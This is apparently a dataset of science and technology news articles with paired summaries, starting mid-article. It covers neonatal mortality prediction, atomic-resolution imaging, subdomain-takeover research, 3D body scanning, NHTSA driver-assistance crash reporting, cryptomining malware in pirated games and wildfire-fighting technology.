existing conditions," said Ms Baker. She said the alternative was measuring variables that do not change - such as birthweight - that prevents recalculation of the infant's risk on an ongoing basis and does not show their response to treatment. "An ideal scheme would be one that uses fundamental demographics and routinely measured vital signs to provide continuous assessment. This would allow for assessment of changing risk without placing unreasonable additional burden on healthcare staff," said Ms Baker. She said the JCU team's research, published in the journal Computers in Biology and Medicine , had developed the Neonatal Artificial Intelligence Mortality Score (NAIMS), a hybrid neural network that relies on simple demographics and trends in heart and respiratory rate to determine mortality risk. "Using data generated over a 12 hour period, NAIMS showed strong performance in predicting an infant's risk of mortality within 3, 7, or 14 days. "This is the first work we're aware of that uses only easy-to-record demographics and respiratory rate and heart rate data to produce an accurate prediction of immediate mortality risk," said Ms Baker. She said the technique was fast with no need for invasive procedures or knowledge of medical histories. "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends," said Ms Baker. She said NAIMS had proved accurate when tested against hospital mortality records of preterm babies and had the added advantage over existing schemes of being able to perform a risk assessment based on any 12-hours of data during the patient's stay. Ms Baker said the next step in the process was to partner with local hospitals to gather more data and undertake further testing. "Additionally, we aim to conduct research into the prediction of other outcomes in neo-natal intensive care, such as the onset of sepsis and patient length of stay," said Ms Baker.
181
See the Highest-Resolution Atomic Image Ever Captured
Behold the highest-resolution image of atoms ever taken. To create it, Cornell University researchers captured a sample from a crystal in three dimensions and magnified it 100 million times, doubling the resolution that earned the same scientists a Guinness World Record in 2018. Their imaging process could help develop materials for designing more powerful and efficient phones, computers and other electronics, as well as longer-lasting batteries. The scientists obtained the image using a technique called electron ptychography. It involves shooting a beam of electrons, about a billion per second, at a target material. The beam moves infinitesimally as the electrons are fired, so they hit the sample from slightly different angles - sometimes they pass through cleanly; other times they collide with atoms and bounce around inside the sample before exiting. Cornell physicist David Muller likens the technique to playing dodgeball against opponents who are standing in the dark. The dodgeballs are electrons, and their targets are individual atoms. Although Muller cannot see the targets, he can detect where the "dodgeballs" end up. Based on the speckle pattern generated by billions of these electrons as they hit a detector, machine-learning algorithms can calculate where the atoms were in the sample and what their shapes might be, thus creating an image. Previously, electron ptychography had only been used to image extremely flat samples just one to a few atoms thick. But Muller and his colleagues' new study in Science describes capturing multiple layers tens to hundreds of atoms thick. This makes the technique much more relevant to materials scientists, who typically study the properties of samples with a thickness of about 30 to 50 nanometers. (This is smaller than the length your fingernails grow in a minute but many times thicker than what electron ptychography could image in the past.) "They can actually look at stacks of atoms now, so it's amazing," says University of Sheffield engineer Andrew Maiden, who helped to develop ptychography but was not part of the new study. "The resolution is just staggering." This result marks an important advancement in the world of electron microscopy . Invented in the early 1930s, standard electron microscopes made it possible to see objects such as polioviruses, which are smaller than the wavelengths of visible light. But electron microscopes had a limit: increasing their resolution required raising the electron beam's energy, and eventually the necessary energy would become so great that it would damage the sample. Ptychography, in contrast, uses a detector that can record all the different angles the beam can scatter to at every beam position, getting much more information with the same wavelength and lens. Researchers theorized ptychography in the 1960s and conceived its use to overcome electron lenses' limits in the 1980s. But because of computing and detector limitations and the complex math required, the technique was not put into practice for decades. Early versions worked far better with visible light and x-rays than the electrons needed to image atomic-size objects. Meanwhile scientists kept improving electron microscopes. "You had to be a true believer in ptychography to be paying attention to it," Muller says. Just in the past several years Muller and his team developed a detector good enough for electron ptychography to work experimentally. By 2018 they had figured out how to reconstruct two-dimensional samples with the technique, producing what Muller calls "the highest-resolution image by any method in the world" (and winning that Guinness record). The researchers accomplished this feat using a lower-energy wavelength than other methods, letting them better preserve what they viewed. The next challenge was thicker samples, in which an electron wave ricochets off many atoms before reaching a detector: the so-called multiple scattering problem. The team members found that with enough overlapping speckle patterns and computing power (and, according to Muller, "brute force and ignorance"), they could work backward to determine which layout of atoms produced a given pattern. To do this, they fine-tuned a model until the pattern it generated matched the experimentally produced one. Such high-resolution imaging techniques are essential for developing the next generation of electronic devices. For example, many researchers are looking beyond silicon-based computer chips to find more efficient semiconductors. To make this happen, engineers need to know what they are working with at an atomic level - which means using technologies such as electron ptychography. "We have these tools sitting there, waiting to help us optimize what will become the next generation of devices," says J. Murray Gibson, dean of the Florida A&M University-Florida State University College of Engineering, who was not part of the new study. Batteries are a particularly promising area for applying imaging techniques such as electron ptychography, says Roger Falcone, a physicist at the University of California, Berkeley, who was also not involved with the research. Making batteries that can store a lot of energy safely is critical for the transition from fossil fuels to renewable energies, including wind and solar. "Imaging technologies are very important to improving batteries because we can look at the chemical reactions in detail," Falcone says. But there is still a long way to go. For electron ptychography to lead to breakthroughs for your cell phone or laptop, it must do more than reconstruct an image - it must precisely locate an individual atom in a material. Although the scientists showed how their new process could do so in theory, they have not yet demonstrated it experimentally. "With any new technique, it always takes a bit of time for your fellow researchers to try this out and see if it bears out into real, practical uses," says Leslie Thompson, a materials characterization expert at IBM, who was not involved in the new study. "To the extent that you invent a new tool like a high-resolution microscope, my sense is you tend to be surprised [by] what problem it's applied to solve," Falcone says. "People will look at things we can't even imagine now - and solve a problem that we're not even sure we have yet."
The highest-resolution atomic image to date was captured by Cornell University researchers from a crystal sample, magnified at a factor of 100 million. The researchers recorded the image via electron ptychography, in which about 1 billion electrons per second are beamed at a target material, with infinitesimal beam movement ensuring the sample is struck from slightly different angles each time. Machine learning algorithms use the resulting speckle pattern to calculate the atoms' locations and possible shapes. The method extends electron ptychography's scope from extremely flat samples to multiple layers tens to hundreds of atoms thick.
[]
[]
[]
scitechnews
None
None
None
None
The highest-resolution atomic image to date was captured by Cornell University researchers from a crystal sample, magnified at a factor of 100 million. The researchers recorded the image via electron ptychography, in which about 1 billion electrons per second are beamed at a target material, with infinitesimal beam movement ensuring the sample is struck from slightly different angles each time. Machine learning algorithms use the resulting speckle pattern to calculate the atoms' locations and possible shapes. The method extends electron ptychography's scope from extremely flat samples to multiple layers tens to hundreds of atoms thick. Behold the highest-resolution image of atoms ever taken. To create it, Cornell University researchers captured a sample from a crystal in three dimensions and magnified it 100 million times, doubling the resolution that earned the same scientists a Guinness World Record in 2018. Their imaging process could help develop materials for designing more powerful and efficient phones, computers and other electronics, as well as longer-lasting batteries. The scientists obtained the image using a technique called electron ptychography. It involves shooting a beam of electrons, about a billion per second, at a target material. The beam moves infinitesimally as the electrons are fired, so they hit the sample from slightly different angles - sometimes they pass through cleanly; other times they collide with atoms and bounce around inside the sample before exiting. Cornell physicist David Muller likens the technique to playing dodgeball against opponents who are standing in the dark. The dodgeballs are electrons, and their targets are individual atoms. Although Muller cannot see the targets, he can detect where the "dodgeballs" end up. Based on the speckle pattern generated by billions of these electrons as they hit a detector, machine-learning algorithms can calculate where the atoms were in the sample and what their shapes might be, thus creating an image. Previously, electron ptychography had only been used to image extremely flat samples just one to a few atoms thick. But Muller and his colleagues' new study in Science describes capturing multiple layers tens to hundreds of atoms thick. This makes the technique much more relevant to materials scientists, who typically study the properties of samples with a thickness of about 30 to 50 nanometers. (This is smaller than the length your fingernails grow in a minute but many times thicker than what electron ptychography could image in the past.) "They can actually look at stacks of atoms now, so it's amazing," says University of Sheffield engineer Andrew Maiden, who helped to develop ptychography but was not part of the new study. "The resolution is just staggering." This result marks an important advancement in the world of electron microscopy . Invented in the early 1930s, standard electron microscopes made it possible to see objects such as polioviruses, which are smaller than the wavelengths of visible light. But electron microscopes had a limit: increasing their resolution required raising the electron beam's energy, and eventually the necessary energy would become so great that it would damage the sample. Ptychography, in contrast, uses a detector that can record all the different angles the beam can scatter to at every beam position, getting much more information with the same wavelength and lens. Researchers theorized ptychography in the 1960s and conceived its use to overcome electron lenses' limits in the 1980s. But because of computing and detector limitations and the complex math required, the technique was not put into practice for decades. Early versions worked far better with visible light and x-rays than the electrons needed to image atomic-size objects. Meanwhile scientists kept improving electron microscopes. "You had to be a true believer in ptychography to be paying attention to it," Muller says. Just in the past several years Muller and his team developed a detector good enough for electron ptychography to work experimentally. By 2018 they had figured out how to reconstruct two-dimensional samples with the technique, producing what Muller calls "the highest-resolution image by any method in the world" (and winning that Guinness record). The researchers accomplished this feat using a lower-energy wavelength than other methods, letting them better preserve what they viewed. The next challenge was thicker samples, in which an electron wave ricochets off many atoms before reaching a detector: the so-called multiple scattering problem. The team members found that with enough overlapping speckle patterns and computing power (and, according to Muller, "brute force and ignorance"), they could work backward to determine which layout of atoms produced a given pattern. To do this, they fine-tuned a model until the pattern it generated matched the experimentally produced one. Such high-resolution imaging techniques are essential for developing the next generation of electronic devices. For example, many researchers are looking beyond silicon-based computer chips to find more efficient semiconductors. To make this happen, engineers need to know what they are working with at an atomic level - which means using technologies such as electron ptychography. "We have these tools sitting there, waiting to help us optimize what will become the next generation of devices," says J. Murray Gibson, dean of the Florida A&M University-Florida State University College of Engineering, who was not part of the new study. Batteries are a particularly promising area for applying imaging techniques such as electron ptychography, says Roger Falcone, a physicist at the University of California, Berkeley, who was also not involved with the research. Making batteries that can store a lot of energy safely is critical for the transition from fossil fuels to renewable energies, including wind and solar. "Imaging technologies are very important to improving batteries because we can look at the chemical reactions in detail," Falcone says. But there is still a long way to go. For electron ptychography to lead to breakthroughs for your cell phone or laptop, it must do more than reconstruct an image - it must precisely locate an individual atom in a material. Although the scientists showed how their new process could do so in theory, they have not yet demonstrated it experimentally. "With any new technique, it always takes a bit of time for your fellow researchers to try this out and see if it bears out into real, practical uses," says Leslie Thompson, a materials characterization expert at IBM, who was not involved in the new study. "To the extent that you invent a new tool like a high-resolution microscope, my sense is you tend to be surprised [by] what problem it's applied to solve," Falcone says. "People will look at things we can't even imagine now - and solve a problem that we're not even sure we have yet."
182
Danger Caused by Subdomains
The internet is full of dangers: Sensitive data can be leaked, malicious websites can allow hackers to access private computers. The Security & Privacy Research Unit at TU Wien in collaboration with Ca' Foscari University has now uncovered a new important security vulnerability that has been overlooked so far. Large websites often have many subdomains - for example, "sub.example.com" could be a subdomain of the website "example.com." With certain tricks, it is possible to take control of such subdomains. And if that happens, new security holes open up that also put people at risk who simply want to use the actual website (in this example: example.com). The research team studied these vulnerabilities and also analysed how widespread the problem is: 50,000 of the world's most important websites were examined, and 1,520 vulnerable subdomains were discovered. The team was invited to the 30th USENIX Security Symposium, one of the most prestigious scientific conferences in the field of cybersecurity. The results have now been published online. "At first glance, the problem doesn't seem that bad," says Marco Squarcina from the Institute of Logic and Computation at TU Vienna. "After all, you might think that you can only gain access to a subdomain if you're explicitly allowed by the administrator of the website, but that's a mistake." This is because often a subdomain points to another website that is physically stored on completely different servers. Maybe you own the website example.com and want to add a blog. You don't want to build it from scratch, but instead use an existing blogging service of another website. Therefore, a subdomain, such as blog.example.com, is connected to another site. "If you use the example.com page and click on the blog there, you won't notice anything suspicious," says Marco Squarcina. "The address bar of the browser shows the correct subdomain blog.example.com, but the data now comes from a completely different server." But what happens if one day this link is no longer valid? Perhaps the blog is not needed anymore or it is relaunched elsewhere. Then the link from blog.example.com points to an external page that is no longer there. In this case, one speaks of "dangling records" - loose ends in the website's network that are ideal points of attack. "If such dangling records are not promptly removed, attackers can set up their own page there, which will then show up at sub.example.com," says Mauro Tempesta (also TU Wien). This is a problem because websites apply different security rules to different areas of the internet. Their own subdomains are typically considered "safe," even if they are in fact controlled from outside. For example, cookies placed on users by the main website can be overwritten and potentially accessed from any subdomains: in the worst case, an intruder can then impersonate another user and carry out illicit actions on their behalf. The team composed by Marco Squarcina, Mauro Tempesta, Lorenzo Veronese,Matteo Maffei (TU Wien), and Stefano Calzavara (Ca' Foscari) investigated how common this problem is: "We examined 50,000 of the most visited sites in the world, discovering 26 million subdomains," says Marco Squarcina. "On 887 of these sites we found vulnerabilities, on a total of 1,520 vulnerable subdomains." Among the vulnerable sites were some of the most famous websites of all, such as cnn.com or harvard.edu. University sites are more likely to be affected because they usually have a particularly large number of subdomains. "We contacted all the people responsible for the vulnerable sites. Nevertheless, 6 months later, the problem was still only fixed on 15% of these subdomains," says Marco Squarcina. "In principle, it would not be difficult to fix these vulnerabilities. We hope that with our work we can create more awareness about this security threat." Further information and the original paper: canitakeyoursubdomain.name , opens an external URL in a new window Prof. Matteo Maffei Institute for Logic and Computation TU Wien Favoritenstraße 9-11, 1040 Vienna +43 1 58801 184860 matteo.maffei @ tuwien.ac.at Dott. Marco Squarcina Institute for Logic and Computation TU Wien Favoritenstraße 9-11, 1040 Vienna +43 1 58801 192607 marco.squarcina @ tuwien.ac.at
A security vulnerability could enable hackers to commandeer Website subdomains and inflict severe damage, according to researchers at Austria's Technical University of Wien (TU Wien) and Italy's Ca' Foscari University. The vulnerability lies in the persistence of dangling records - links to subdomains no longer in use - where TU Wien's Mauro Tempesta said attackers can establish their own domains. Such exploits can create vulnerabilities that pose risks to anyone who wants to use the actual site. The researchers found 1,520 vulnerable subdomains within 50,000 of the world's most critical Websites, and university sites were more likely to be vulnerable, since they have an especially large number of subdomains. TU Wien's Marco Squarcina said only 15% of those vulnerabilities have been corrected six months after administrators were warned of the threat.
[]
[]
[]
scitechnews
None
None
None
None
A security vulnerability could enable hackers to commandeer Website subdomains and inflict severe damage, according to researchers at Austria's Technical University of Wien (TU Wien) and Italy's Ca' Foscari University. The vulnerability lies in the persistence of dangling records - links to subdomains no longer in use - where TU Wien's Mauro Tempesta said attackers can establish their own domains. Such exploits can create vulnerabilities that pose risks to anyone who wants to use the actual site. The researchers found 1,520 vulnerable subdomains within 50,000 of the world's most critical Websites, and university sites were more likely to be vulnerable, since they have an especially large number of subdomains. TU Wien's Marco Squarcina said only 15% of those vulnerabilities have been corrected six months after administrators were warned of the threat. The internet is full of dangers: Sensitive data can be leaked, malicious websites can allow hackers to access private computers. The Security & Privacy Research Unit at TU Wien in collaboration with Ca' Foscari University has now uncovered a new important security vulnerability that has been overlooked so far. Large websites often have many subdomains - for example, "sub.example.com" could be a subdomain of the website "example.com." With certain tricks, it is possible to take control of such subdomains. And if that happens, new security holes open up that also put people at risk who simply want to use the actual website (in this example: example.com). The research team studied these vulnerabilities and also analysed how widespread the problem is: 50,000 of the world's most important websites were examined, and 1,520 vulnerable subdomains were discovered. The team was invited to the 30th USENIX Security Symposium, one of the most prestigious scientific conferences in the field of cybersecurity. The results have now been published online. "At first glance, the problem doesn't seem that bad," says Marco Squarcina from the Institute of Logic and Computation at TU Vienna. "After all, you might think that you can only gain access to a subdomain if you're explicitly allowed by the administrator of the website, but that's a mistake." This is because often a subdomain points to another website that is physically stored on completely different servers. Maybe you own the website example.com and want to add a blog. You don't want to build it from scratch, but instead use an existing blogging service of another website. Therefore, a subdomain, such as blog.example.com, is connected to another site. "If you use the example.com page and click on the blog there, you won't notice anything suspicious," says Marco Squarcina. "The address bar of the browser shows the correct subdomain blog.example.com, but the data now comes from a completely different server." But what happens if one day this link is no longer valid? Perhaps the blog is not needed anymore or it is relaunched elsewhere. Then the link from blog.example.com points to an external page that is no longer there. In this case, one speaks of "dangling records" - loose ends in the website's network that are ideal points of attack. "If such dangling records are not promptly removed, attackers can set up their own page there, which will then show up at sub.example.com," says Mauro Tempesta (also TU Wien). This is a problem because websites apply different security rules to different areas of the internet. Their own subdomains are typically considered "safe," even if they are in fact controlled from outside. For example, cookies placed on users by the main website can be overwritten and potentially accessed from any subdomains: in the worst case, an intruder can then impersonate another user and carry out illicit actions on their behalf. The team composed by Marco Squarcina, Mauro Tempesta, Lorenzo Veronese,Matteo Maffei (TU Wien), and Stefano Calzavara (Ca' Foscari) investigated how common this problem is: "We examined 50,000 of the most visited sites in the world, discovering 26 million subdomains," says Marco Squarcina. "On 887 of these sites we found vulnerabilities, on a total of 1,520 vulnerable subdomains." Among the vulnerable sites were some of the most famous websites of all, such as cnn.com or harvard.edu. University sites are more likely to be affected because they usually have a particularly large number of subdomains. "We contacted all the people responsible for the vulnerable sites. Nevertheless, 6 months later, the problem was still only fixed on 15% of these subdomains," says Marco Squarcina. "In principle, it would not be difficult to fix these vulnerabilities. We hope that with our work we can create more awareness about this security threat." Further information and the original paper: canitakeyoursubdomain.name , opens an external URL in a new window Prof. Matteo Maffei Institute for Logic and Computation TU Wien Favoritenstraße 9-11, 1040 Vienna +43 1 58801 184860 matteo.maffei @ tuwien.ac.at Dott. Marco Squarcina Institute for Logic and Computation TU Wien Favoritenstraße 9-11, 1040 Vienna +43 1 58801 192607 marco.squarcina @ tuwien.ac.at
183
3D Scanning Breakthrough Means Results Are 4,500% More Accurate
Researchers from Loughborough University and the University of Manchester have written a free algorithm that can be used with any scanning machine. The new code, called Gryphon , is a simple data processing tool that identifies errors in the scan measurements and removes them. A new paper published in the journal Ergonomics shows how the team took 121 measurements from 97 participants using the Gryphon code and compared them to the current industry-standard data processing method. They found that the average margin of error for current 3D scanning machines is around 13.8cm when data is captured non-consecutively. However, once the Gryphon code had been used alongside capturing data consecutively, the figure fell to 0.3cm... a 4500% improvement in precision. Lead author Dr Chris Parker, of Loughborough School of Design and Creative Art, said: "When 3D body scanners measure people, the measurements can be so different from what you would take with a tape measure that the results cannot be easily used." "In fact, 0% of current measurements meet the precision you might expect from an expert, and are too imprecise to design clothes. We change that. "At the minute, practitioners who use 3D scanners need a lot of training to spot errors, remove them from the data set, and rescan the person - so mistakes are common. Because of this, 3D body scanning is slow and, in many ways, unreliable. "If the 3D body scanning industry adopts Gryphon into their software, then they will make their measurements 4500% more precise than they currently are - and it can all be done through a simple software update. "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D Body Scanning create custom garments for everyone - without the fuss." Scanners are used in various industries such as performance sportswear design, fashion design and 3D morphometric evaluation. They are also used for ergonomic and anthropometric investigation of the human form. ENDS
Scientists at the U.K.'s Loughborough University and University of Manchester have boosted the accuracy of three-dimensional (3D) body scans by 4,500% via a free algorithm that can be used with any scanning system. The Gryphon code can identify and remove errors in scan measurements. In 121 measurements of 97 participants, Gryphon had a margin of error of 0.3 centimeters, compared to an average of 13.8 centimeters for current 3D scanning machines when data is captured non-consecutively. Loughborough's Chris Parker said, "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D body scanning create custom garments for everyone - without the fuss."
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the U.K.'s Loughborough University and University of Manchester have boosted the accuracy of three-dimensional (3D) body scans by 4,500% via a free algorithm that can be used with any scanning system. The Gryphon code can identify and remove errors in scan measurements. In 121 measurements of 97 participants, Gryphon had a margin of error of 0.3 centimeters, compared to an average of 13.8 centimeters for current 3D scanning machines when data is captured non-consecutively. Loughborough's Chris Parker said, "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D body scanning create custom garments for everyone - without the fuss." Researchers from Loughborough University and the University of Manchester have written a free algorithm that can be used with any scanning machine. The new code, called Gryphon , is a simple data processing tool that identifies errors in the scan measurements and removes them. A new paper published in the journal Ergonomics shows how the team took 121 measurements from 97 participants using the Gryphon code and compared them to the current industry-standard data processing method. They found that the average margin of error for current 3D scanning machines is around 13.8cm when data is captured non-consecutively. However, once the Gryphon code had been used alongside capturing data consecutively, the figure fell to 0.3cm... a 4500% improvement in precision. Lead author Dr Chris Parker, of Loughborough School of Design and Creative Art, said: "When 3D body scanners measure people, the measurements can be so different from what you would take with a tape measure that the results cannot be easily used." "In fact, 0% of current measurements meet the precision you might expect from an expert, and are too imprecise to design clothes. We change that. "At the minute, practitioners who use 3D scanners need a lot of training to spot errors, remove them from the data set, and rescan the person - so mistakes are common. Because of this, 3D body scanning is slow and, in many ways, unreliable. "If the 3D body scanning industry adopts Gryphon into their software, then they will make their measurements 4500% more precise than they currently are - and it can all be done through a simple software update. "We hope this will speed up 3D body scanning, removing the need for highly trained operators to correct mistakes, and - ultimately - help 3D Body Scanning create custom garments for everyone - without the fuss." Scanners are used in various industries such as performance sportswear design, fashion design and 3D morphometric evaluation. They are also used for ergonomic and anthropometric investigation of the human form. ENDS
184
Verizon Shows Off 5G-Connected Robots at Barcelona Conference
Wireless network operator Verizon this week showcased two robots that reportedly communicate with each other via 5G connectivity and mobile edge computing at the Mobile World conference in Barcelona, Spain. Edge computing analyzes bulk data where it was collected using augmented reality and machine learning, and demands rapid data transfers that only high-speed 5G signals can deliver. Verizon's Rima Qureshi said, "5G will make it possible for robots to connect with other robots and devices of all kinds in a way that simply wasn't possible before." Qureshi said drones using 5G-enabled communications would be able to stream video to multiple recipients simultaneously, so they could each focus on different aspects of an image.
[]
[]
[]
scitechnews
None
None
None
None
Wireless network operator Verizon this week showcased two robots that reportedly communicate with each other via 5G connectivity and mobile edge computing at the Mobile World conference in Barcelona, Spain. Edge computing analyzes bulk data where it was collected using augmented reality and machine learning, and demands rapid data transfers that only high-speed 5G signals can deliver. Verizon's Rima Qureshi said, "5G will make it possible for robots to connect with other robots and devices of all kinds in a way that simply wasn't possible before." Qureshi said drones using 5G-enabled communications would be able to stream video to multiple recipients simultaneously, so they could each focus on different aspects of an image.
185
Crashes Involving Tesla Autopilot, Other Driver-Assistance Systems Attract Scrutiny
The U.S. National Highway Traffic Safety Administration (NHTSA) is requiring automakers to start disclosing and tracking crashes involving vehicles that use advanced driver-assistance systems (ADAS). The agency has initiated probes into about three dozen collisions of vehicles using such systems, all but six involving Teslas. The NHTSA said automakers must furnish reports of serious collisions within a day of learning about them; provide more complete data on serious crashes involving ADAS systems within 10 days; and report on all crashes involving such systems every month. The NHTSA's Steven Cliff said these mandates will give the agency access to data that can help rapidly identify safety problems in ADAS systems.
[]
[]
[]
scitechnews
None
None
None
None
The U.S. National Highway Traffic Safety Administration (NHTSA) is requiring automakers to start disclosing and tracking crashes involving vehicles that use advanced driver-assistance systems (ADAS). The agency has initiated probes into about three dozen collisions of vehicles using such systems, all but six involving Teslas. The NHTSA said automakers must furnish reports of serious collisions within a day of learning about them; provide more complete data on serious crashes involving ADAS systems within 10 days; and report on all crashes involving such systems every month. The NHTSA's Steven Cliff said these mandates will give the agency access to data that can help rapidly identify safety problems in ADAS systems.
187
Hackers Infecting Gamers' PCs with Malware to Make Millions From Crypto
This is not the first time that malware has impacted games. Researchers at Cisco-Talos discovered malware inside cheat software for multiple games in March. Meanwhile, a new hacking campaign targeted gamers via the Steam platform earlier this month. The number of cyberattacks on gamers has surged 340% during the coronavirus pandemic, according to a report from Akamai Security Research this week. "Criminals are relentless, and we have the data to show it," said Steve Ragan, Akamai security researcher and author of the State of the Internet/Security report. "We're observing a remarkable persistence in video game industry defenses being tested on a daily - and often hourly - basis by criminals probing for vulnerabilities through which to breach servers and expose information. We're also seeing numerous group chats forming on popular social networks that are dedicated to sharing attack techniques and best practices."
Security firm Avast has found that hackers are exploiting gamers with "Crackonosh" malware to generate millions by mining cryptocurrency using gamers' computers. Avast researchers said the criminals hide Crackonosh in free downloadable versions of games like NBA 2K19, Grand Theft Auto V, and Far Cry 5, available on torrent sites; upon installation, Crackonosh starts the gamers' PCs crypto-mining. The researchers estimate Crackonosh has been used to mine $2 million in Monero cryptocurrency since June 2018; Avast's Daniel Benes said about 220,000 users have been infected worldwide, with an additional 800 devices infected daily. Benes said indications of the malware's presence can include slower PC performance and higher-than-normal electricity bills.
[]
[]
[]
scitechnews
None
None
None
None
Security firm Avast has found that hackers are exploiting gamers with "Crackonosh" malware to generate millions by mining cryptocurrency using gamers' computers. Avast researchers said the criminals hide Crackonosh in free downloadable versions of games like NBA 2K19, Grand Theft Auto V, and Far Cry 5, available on torrent sites; upon installation, Crackonosh starts the gamers' PCs crypto-mining. The researchers estimate Crackonosh has been used to mine $2 million in Monero cryptocurrency since June 2018; Avast's Daniel Benes said about 220,000 users have been infected worldwide, with an additional 800 devices infected daily. Benes said indications of the malware's presence can include slower PC performance and higher-than-normal electricity bills. This is not the first time that malware has impacted games. Researchers at Cisco-Talos discovered malware inside cheat software for multiple games in March. Meanwhile, a new hacking campaign targeted gamers via the Steam platform earlier this month. The number of cyberattacks on gamers has surged 340% during the coronavirus pandemic, according to a report from Akamai Security Research this week. "Criminals are relentless, and we have the data to show it," said Steve Ragan, Akamai security researcher and author of the State of the Internet/Security report. "We're observing a remarkable persistence in video game industry defenses being tested on a daily - and often hourly - basis by criminals probing for vulnerabilities through which to breach servers and expose information. We're also seeing numerous group chats forming on popular social networks that are dedicated to sharing attack techniques and best practices."
188
California Wildfires: Fighting Bigger Blazes with Silicon Valley Technology
Startup Lumineye began with a goal of giving soldiers power to see through walls. But climate change has broadened the market, and Lumineye is now working with firefighters to tweak its product - a hand-held device that uses radar to see people inside buildings and in thick brush. "Unfortunately, the more often fires are occurring, the more we'll be focused on that use case," said Megan Lacy, co-founder and co-CEO of the company birthed from a class that grew out of a Stanford University entrepreneurship initiative. California's drought, plus forests full of fuels and communities along narrow roads in heavily treed areas make for a lethal recipe, tragically exemplified by the 2018 Camp Fire that killed 86 people in Paradise. With scientists agreeing that climate change will make wildfires increasingly catastrophic, the specter of flames devouring communities and smothering the state in smoke is driving innovation, much of it in Silicon Valley, to fight fires with new technology. Last year, a wall of fire swept down from the Santa Cruz Mountains toward tech-industry guru Steve Blank's palatial home overlooking the ocean south of Pescadero. His house remains standing thanks to what he calls the heroism of Cal Fire's ground forces, who helped him fight the flames to within a foot of his home. But if California does not aggressively implement new technologies, Blank believes, much of the Bay Area and the rest of California will be left in smoky ruins. "You're looking for force multipliers," said Blank, who invests in Rain , a Palo Alto startup making retardant-dropping drones. "How do we fight this exponential growth (in wildfires) without exceeding the gross domestic product of California?" Blank imagines a future where satellites detect fires as soon as they start and artificial intelligence software dispatches firefighting drones. That Blank would propose a Silicon Valley solution featuring AI and flying robots is perhaps unsurprising. He's an influential startup expert who teaches at UC Berkeley and Stanford University - his "Hacking for Defense" class at Stanford grew into a national program that produced Lumineye. And Blank's vision appears to be getting closer to reality every day. Cal Fire and other agencies have begun using AI, satellites and drones, and are examining other cutting-edge solutions. San Bernardino County Fire Chief Dan Munsey noted that not long ago, fire chiefs relied mostly on paper maps and ink markers. "The technology adoption we've seen over the last three years has exploded," Munsey said. During the Santa Cruz Mountains fire last year, one in a series of huge blazes sparked by dry lightning, Bay Area startup Zonehaven's map-based evacuation software for official and citizen use went live in what CEO Charlie Crocker described as "our trial by fire." Zonehaven was founded in 2018, and already, Cal Fire and dozens of other agencies and local governments - including Santa Clara, San Mateo, Contra Costa and Alameda counties - are adopting it to coordinate the safe exodus of people from threatened areas. The public app shows residents where they are on a map, with evacuation status - from advisory to warning to order - shown by the coloring of their zone. "If you were to really boil down what is the real issue in what I call the era of the mega-fires, it's evacuations," said Cal Fire's Santa Clara County unit Chief Jake Hess. Last year's fires torched a record 4.3 million acres in California, and this year, 85% of California is in extreme drought. Seven major wildfires were already burning last week across the state. At Rain, which is trying to sell service contracts for its drones to Cal Fire and other agencies, CEO Maxwell Brodie believes that while traditional firefighting methods are crucial they are insufficient in the face of more and bigger fires. "It doesn't matter how many people or aircraft or tankers you throw at the problem, our solutions do not scale," he said. "A significant challenge integrating new technology into fire operations is overcoming the ways things have always been." In the Menlo Park Fire District, Chief Harold Schapelhouman oversees a fleet of 30 camera-bearing drones he says could provide valuable eyes in the sky during wildfires, including at night and in smoke and weather conditions that ground choppers and planes. Cal Fire's use of drones for landscape and damage surveys is a good step, he believes, but the agency's safety rules don't allow him to launch his drones during wildfires, even flying low enough to not threaten firefighting aircraft. "Take the handcuffs off," he said. "Let us fly." Capella Space , a San Francisco company that has four satellites in orbit that can provide detailed landscape photos day or night, through clouds or smoke, plans to pitch its services to Cal Fire and the U.S. Forest Service so the agencies could "provide rapid information to the people on the ground to ensure that when they go into an area they know what to expect," said Dan Getman, vice-president of product. Stanford University materials science professor Eric Appel, who led development of a fire-stopping gel for roadsides, said caution about new firefighting technology is warranted "because people have also been trying to sell snake oil in this field for a long time." While Cal Fire's emergency funding in 2020-21 skyrocketed from an initial $360 million to more than $1 billion by the end of 2020 - paying for more firefighters and aircraft - money for new technologies is comparatively scarce, said Appel. Phillip SeLegue, deputy chief of Cal Fire's Intel unit, said the agency is responding to technological change along with environmental change and pointed to its adoption of data-processing platform Technosylva, which forecasts, monitors, and predicts fires and their spread. His colleague Hess described the software as "a technological shot in the arm." Cal Fire has also received real-time imagery from U.S. military drones, and invested heavily in a widespread system of forest cameras, Hess noted. The agency gets other feeds from classified Pentagon sources and from satellites that detect ignitions and allow ongoing fire assessment in nearly real-time, all visible on the Technosylva platform along with the ALERT camera views, SeLegue said. Related Articles $68 million price tag to fight CZU Lightning Complex fire Wildfire destroys historic buildings at Big Basin State Park, some redwoods have fallen Panic in Paradise: Nearby Bear Fire triggers locals who lost everything in Camp Fire to evacuate again Artificial intelligence software that processes imagery from Cal Fire aircraft and sends it to ground commanders to show fire locations should be in full use this year, SeLegue added. The agency plans to align with the U.S. Forest Service in using drones to ignite controlled burns to block fire spread, and is working with NASA on integrating autonomous drones into firefighting, potentially to carry people and supplies, provide communication links, or even drop retardant, he said. Whether technology can save us amid California's warming climate remains to be seen. Many communities in the Oakland and Berkeley hills, or in Woodside, Los Gatos, Felton and Bonny Doon, are nestled in forests and have limited escape routes. "It's really just a dice game," Stanford's Appel said. "The more big catastrophic fires we have, the greater chance that we have another Paradise."
A host of Silicon Valley-based technology developers is working with firefighters to enhance their firefighting capabilities. Technology industry investor Steve Blank envisions satellites detecting blazes as soon as they break out, with firefighting drones dispatched by artificial intelligence (AI). The California Department of Forestry and Fire Protection (Cal Fire) and other agencies have started using AI, satellites, and drones, and are considering additional measures. Phillip SeLegue at Cal Fire's Intelligence unit cited the adoption of the Technosylva data-processing platform, which predicts and monitors fires and their spread via a combination of real-time satellite and camera imagery. SeLegue also said this year should see the full deployment of aircraft imagery-processing AI software that transmits fire-location data to ground commanders.
[]
[]
[]
scitechnews
None
None
None
None
